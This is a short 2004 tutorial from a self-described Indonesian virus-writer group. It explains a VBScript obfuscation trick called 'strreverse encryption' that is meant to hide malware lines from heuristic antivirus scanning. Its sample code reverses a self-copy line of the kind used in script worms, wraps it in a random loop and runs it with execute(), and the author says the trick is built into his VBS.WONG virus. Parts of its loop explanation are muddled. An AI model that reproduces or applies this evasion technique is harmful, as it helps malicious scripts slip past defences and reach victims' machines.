'____________Simple_Strreverse_Encryption_v_0.3__By sevenC______________
'   _______   _______   _       _   _______       ____   ____  _______
'  / ____ \\ / ____ \\ /\\     /\\ / ____ \\     /   \\ /  // / ____ \\
' / //___\// \ \\_ \// \ \\   / // \ \\_ \//    /  /\ \/  // / //   \//
' \______ \\ / __//     \ \\ / //  / __//      /  // \   //  \ \\   _
' /\\___/ // \ \\__/\\   \ \/ //   \ \\__/\\  /  //  /  //    \ \\__/\\
' \______//   \_____//    \__//     \_____// /__//  /__//      \_____//
'________________________http://trax.to/sevenC__________________________
'________________________sevenC_zone@yahoo.com__________________________

This technuiqe has been added in my VBS.WONG
Ok,lets begin...
How to encrypt one line code with this technuiqe..??
See this code first :

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
sse = strreverse(")emaNlluFtpircS.tpircSW(eliFteG.osf=ypc teS")
qw = int(rnd*255)+1
if qw = 200 then
for z = 0 to qw
wong = strreverse(sse)
next
end if
execute(sse)
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

First we need to change a line which gonna be encrypt with strreverse function
For sample :

* sse = strreverse(")emaNlluFtpircS.tpircSW(eliFteG.osf=ypc teS")

it means 
sse = "Set cpy = fso.GetFile(WScript.ScriptFullNname)"

Second,you have to declare the variable of random integer number
For sample :

* qw = int(rnd*255)+1
a result ? qw = random's number
You can change 255 with bigger integer to be more complex

And then

* if qw = 200 then

You must know,You can change 200 above with any numbers you want but it must be even number
Coz If you put anomalous number the code will not work.

* for z = 0 to qw
Looping statement begining from zero to qw

* wong = strreverse(sse)
* next
* end if
* execute(sse)

continue to repeat until qw and execute it

Yeahh... I think it will hard to detect coz we do that in one by one lines of code...!!
hmmm...yeahh...!! isn't it ? Can Heuristic scan it ?

Ok,I think that's all about SSE.V.03 that using "medium strreverse encryption" technique

sevenC-indonesia
Indonesian Virus writer association
http://sevenc.vze.com
sevenC_zone@yahoo.com
Jan-18th-2004